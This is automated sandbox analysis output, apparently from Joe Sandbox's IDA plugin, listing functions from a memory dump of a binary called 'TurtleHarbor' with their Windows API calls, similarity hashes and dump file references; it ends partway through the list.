Part of subcall function 0036F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0036E46F,?,?,?,0036F262,00000000,000000EF,00000119,?,?), ref: 0036F867
Part of subcall function 0036F858: lstrcpyW.KERNEL32(00000000,?), ref: 0036F88D
Part of subcall function 0036F858: lstrcmpiW.KERNEL32(00000000,?,0036E46F,?,?,?,0036F262,00000000,000000EF,00000119,?,?), ref: 0036F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0036F262,00000000,000000EF,00000119,?,?,00000000), ref: 0036E488
lstrcpyW.KERNEL32(00000000,?), ref: 0036E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,0036F262,00000000,000000EF,00000119,?,?,00000000), ref: 0036E4E2

Strings

cdecl, xrefs: 0036E4D9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 598fef94e6d39dc20c3b2828cd83e6981d288d91d5ecf70b9c2c12718708dbd2
Instruction ID: 6ee5c33eef0339e9268015de43c4f8efe9e6c681d4c5f3e919e7796331fe3eb3
Opcode Fuzzy Hash: 598fef94e6d39dc20c3b2828cd83e6981d288d91d5ecf70b9c2c12718708dbd2
Instruction Fuzzy Hash: 9C11D03A200345AFCB27AF34DC45D7A77A8FF46350B41802AF906CB2A4EB31D945C791

Function 00345312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00345331

Part of subcall function 0033593C: __FF_MSGBANNER.LIBCMT ref: 00335953
Part of subcall function 0033593C: __NMSG_WRITE.LIBCMT ref: 0033595A
Part of subcall function 0033593C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,?,?,?,?,00331003,?,0000FFFF), ref: 0033597F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: ce6c85c049602cde0fa84422abc7bf8f34d1de6bdb05fa848a06ed2ba8bc3b7b
Instruction ID: 68e76724675b13c28ce3e243dbc6e60e242225959dfa7a2be0fcadde62d08100
Opcode Fuzzy Hash: ce6c85c049602cde0fa84422abc7bf8f34d1de6bdb05fa848a06ed2ba8bc3b7b
Instruction Fuzzy Hash: 5411E336906B19AFCB273F70AC8575E37D8AF213A0F11492AF8489E1A2DF7099409790

Function 00374365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00374385
_memset.LIBCMT ref: 003743A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003743F8
CloseHandle.KERNEL32(00000000), ref: 00374401

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 23a994a9be818638b93c78b7ecc157cbaa6861aab31ba4bb378a521e6ed5d518
Instruction ID: bdc3703c33d8c7c7bc8d4c80c8f1b4d2d8f52a5103f9122a97dd07a1df793d44
Opcode Fuzzy Hash: 23a994a9be818638b93c78b7ecc157cbaa6861aab31ba4bb378a521e6ed5d518
Instruction Fuzzy Hash: D6110A75D013287AE7319BA5AC4DFEBBB7CEF45720F00459AF908E7180D2745E808BA4

Function 00386A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377E51,?,?,00000000), ref: 00324041
Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377E51,?,?,00000000,?,?), ref: 00324065

gethostbyname.WSOCK32(?,?,?), ref: 00386A84
WSAGetLastError.WSOCK32(00000000), ref: 00386A8F
_memmove.LIBCMT ref: 00386ABC
inet_ntoa.WSOCK32(?), ref: 00386AC7

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: fdf1db8e31eda17bff009e1ef8545c03890afd0fa9f261a48acd9cc16d9d4c23
Instruction ID: e76aee5ca4932dd4b65f7cdb3ce2d9d0f1b7820a9c51e5670db884fc3b165eb8
Opcode Fuzzy Hash: fdf1db8e31eda17bff009e1ef8545c03890afd0fa9f261a48acd9cc16d9d4c23
Instruction Fuzzy Hash: 68115176500109AFCB0AFBA4DD86DEEB7BCEF19310B148065F502AB262DF309E44CB91

Function 0031166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DefDlgProcW.USER32(?,00000020,?), ref: 003116B4
GetClientRect.USER32(?,?), ref: 0034B93C
GetCursorPos.USER32(?), ref: 0034B946
ScreenToClient.USER32(?,?), ref: 0034B951

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 9d44e3d29d32611e0446e66b7f383ab45f26a7ed5b665e7e06016b8e0d5df95f
Instruction ID: f2c88f4b2c7e323e359011eccb4d247a31c3b1bda4faf2d683ec5454b87ce16d
Opcode Fuzzy Hash: 9d44e3d29d32611e0446e66b7f383ab45f26a7ed5b665e7e06016b8e0d5df95f
Instruction Fuzzy Hash: 60112B35A00019AFCB0AEF54D885DFEB7B8EB0A301F540455FE41E7150D731BA91CBA5

Function 003696F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00369719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0036972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00369741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0036975C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 56a52f725a77faf3579b6032cb531bf42ed00aa81290b75f34bb9154573a3597
Instruction ID: 241f249a3698409166aaa16febb55365f261a7ac57ae532c811d1d3f04e5e45c
Opcode Fuzzy Hash: 56a52f725a77faf3579b6032cb531bf42ed00aa81290b75f34bb9154573a3597
Instruction Fuzzy Hash: BF115A39900218FFEB11DF95CD84F9DBBB8FB48710F204092E900B7294D6716E10DB90

Function 00312111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
GetStockObject.GDI32(00000011), ref: 00312163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 98b4e15483e737adb877cd25695f260e9de9a2a3f0176e83a154e5a20606146d
Instruction ID: 57bc094d14b0b25ca8f578d3b74bd73d8884739976847e3252582dde8fabf23b
Opcode Fuzzy Hash: 98b4e15483e737adb877cd25695f260e9de9a2a3f0176e83a154e5a20606146d
Instruction Fuzzy Hash: 88115B72501649BFDB1B8F90DC85EEBBB6DEF5D354F050126FA0456120D731DCA0ABA0

Function 00371941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 0037195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 00371983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 0037198D
Sleep.KERNEL32(?,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 003719C0

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 390f8066bcc5bc74e36d054b0816dc1d84b502b3b93e6877fe28cb5bab21d917
Instruction ID: e03bf0d25f0fc0fdecf2284cc125f9ee2e200234e999943538420e805518bb6d
Opcode Fuzzy Hash: 390f8066bcc5bc74e36d054b0816dc1d84b502b3b93e6877fe28cb5bab21d917
Instruction Fuzzy Hash: CE117C32D0051CDBCF269FA8D998AEEBBB8FF0B701F018045EA84B6240CB3496518BD1

Function 0039E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0039E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0039E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0039E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0039E234

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 138825ed597a049eb5cfcb84a5656cca233e3f77c45e841dfec1b8c6ee5f0f06
Instruction ID: 848ceb4357a27b9d62f46d1fbf791d7e991b5fd6ff39adfa595c0d06adf5663b
Opcode Fuzzy Hash: 138825ed597a049eb5cfcb84a5656cca233e3f77c45e841dfec1b8c6ee5f0f06
Instruction Fuzzy Hash: 931161B5205304DBEB31EF51DD08F93BBBCEB04B00F10895AA6A6D6550D7B0F904DBA1

Function 003471E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0034720B

Part of subcall function 003478F2: __fltout2.LIBCMT ref: 0034791B

__cftog_l.LIBCMT ref: 00347231
__cftoe_l.LIBCMT ref: 00347263

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 09cd8bbd71906db4dfc03d1eed1a56d0314eb3e09c3026d2cbfc8ca11cb3fec7
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 8F019E3204814EBBCF135E84CC01CEE3FA6BB19344B498915FA186C131C376E9B1EB81

Function 0039B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0039B956
ScreenToClient.USER32(?,?), ref: 0039B96E
ScreenToClient.USER32(?,?), ref: 0039B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0039B9AD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 0ede17ea887a09dc6b2030cd8d99ddfd35deaf7aba30f568ba5ed606dea3aa69
Instruction ID: bce2ec0a3f3a07ac2dcab5a815066becb06c30b82480ddd7ef63ca220d13aef0
Opcode Fuzzy Hash: 0ede17ea887a09dc6b2030cd8d99ddfd35deaf7aba30f568ba5ed606dea3aa69
Instruction Fuzzy Hash: C41143B9D0020AEFDB41CF98D984AEEFBF9FB49314F104156E914E3620D735AA658F90

Function 0039BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0039BCB6
_memset.LIBCMT ref: 0039BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003D8F20,003D8F64), ref: 0039BCF4
CloseHandle.KERNEL32 ref: 0039BD06

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 034724fa0363798d10f5c968e56254aa2448f6aa94a0630d315cf69fc5f1a412
Instruction ID: c528cc822e5b8bc8db2ff73c46bf1a77414d01f7974ea6e0883d2ac282398c05
Opcode Fuzzy Hash: 034724fa0363798d10f5c968e56254aa2448f6aa94a0630d315cf69fc5f1a412
Instruction Fuzzy Hash: FBF082B65413047FE7522B65BC46FBB3B5DEB09750F004422BA08D91A2DB756D1087A8

Function 00377195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 003771A1

Part of subcall function 00377C7F: _memset.LIBCMT ref: 00377CB4

_memmove.LIBCMT ref: 003771C4
_memset.LIBCMT ref: 003771D1
LeaveCriticalSection.KERNEL32(?), ref: 003771E1

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: ae5232caac43a20fba1b14b5f405272897732cb9778b742fc6346b99dbc06185
Instruction ID: bb79a56aaebccff73deb2d2afe2e83635dec688e3fa22a81472986808e4376b7
Opcode Fuzzy Hash: ae5232caac43a20fba1b14b5f405272897732cb9778b742fc6346b99dbc06185
Instruction Fuzzy Hash: FDF05E7A200100ABCF166F55DCC9B8ABB29EF49320F08C055FE085E22ACB35E911DBB4

Function 0039C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 003116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00311729
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311738
Part of subcall function 003116CF: BeginPath.GDI32(?), ref: 0031174F
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0039C3E8
LineTo.GDI32(00000000,?,?), ref: 0039C3F5
EndPath.GDI32(00000000), ref: 0039C405
StrokePath.GDI32(00000000), ref: 0039C413

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 96068a9560466cf8c4725d8d10688b87a4a909d4b6b7f15a4e0553896d2da22e
Instruction ID: 66d20a711a93976d37087078952dc210373c27f90bc962e03b080c46a825f5e8
Opcode Fuzzy Hash: 96068a9560466cf8c4725d8d10688b87a4a909d4b6b7f15a4e0553896d2da22e
Instruction Fuzzy Hash: B0F0EC32006218BBDB23AF52AC0EFCF3F5DAF0A310F048001FA11210E283B41660EFA9

Function 0036AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0036AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 0036AA82
GetCurrentThreadId.KERNEL32 ref: 0036AA89
AttachThreadInput.USER32(00000000), ref: 0036AA90

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ae4cb5bafb2f34619c6dba22ddb0aec54586db96084be7a2735c7efa72afb911
Instruction ID: d356f9b5fd6a15ff71e69e4d64140968e4ca95fadec18f9784b4976839128548
Opcode Fuzzy Hash: ae4cb5bafb2f34619c6dba22ddb0aec54586db96084be7a2735c7efa72afb911
Instruction Fuzzy Hash: 7BE0ED31545228BADB265FA2DD0DEEB7F5CEF177A2F008016F50995060C775C550CBE1

Function 00369330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00369339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00368F04), ref: 00369340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00368F04), ref: 0036934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00368F04), ref: 00369354

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a688bc1f1e28196a3b5cf4bf2da53db32627bfec50db1c7df011d05f779ff45f
Instruction ID: 47b4bebc46abf6e25241201d481666700225fe18912948706023f2a00ff604aa
Opcode Fuzzy Hash: a688bc1f1e28196a3b5cf4bf2da53db32627bfec50db1c7df011d05f779ff45f
Instruction Fuzzy Hash: B3E0863A601311AFD7665FF15D0DB573B6CFF52791F118818B245C9090E634A444C751

Function 003125F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0031260D
SetTextColor.GDI32(?,000000FF), ref: 00312617
SetBkMode.GDI32(?,00000001), ref: 0031262C
GetStockObject.GDI32(00000005), ref: 00312634
GetWindowDC.USER32(?,00000000), ref: 0034C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 0034C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 0034C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 0034C203
GetPixel.GDI32(00000000,?,?), ref: 0034C223
ReleaseDC.USER32(?,00000000), ref: 0034C22E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: bb00e35b143fc4647ce920d19648bad0574f12bc6efab626fa32fbe02f5d1d4a
Instruction ID: e4513d55550797d5e58ed6d95d54bf47fdc1814b7b8d69794a6cfa6d9f1e0ddf
Opcode Fuzzy Hash: bb00e35b143fc4647ce920d19648bad0574f12bc6efab626fa32fbe02f5d1d4a
Instruction Fuzzy Hash: F3E06535504244BBDF6B5F74AC097D83B15EB06331F048366FA69480E187B14590DB11

Function 00350679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00350679
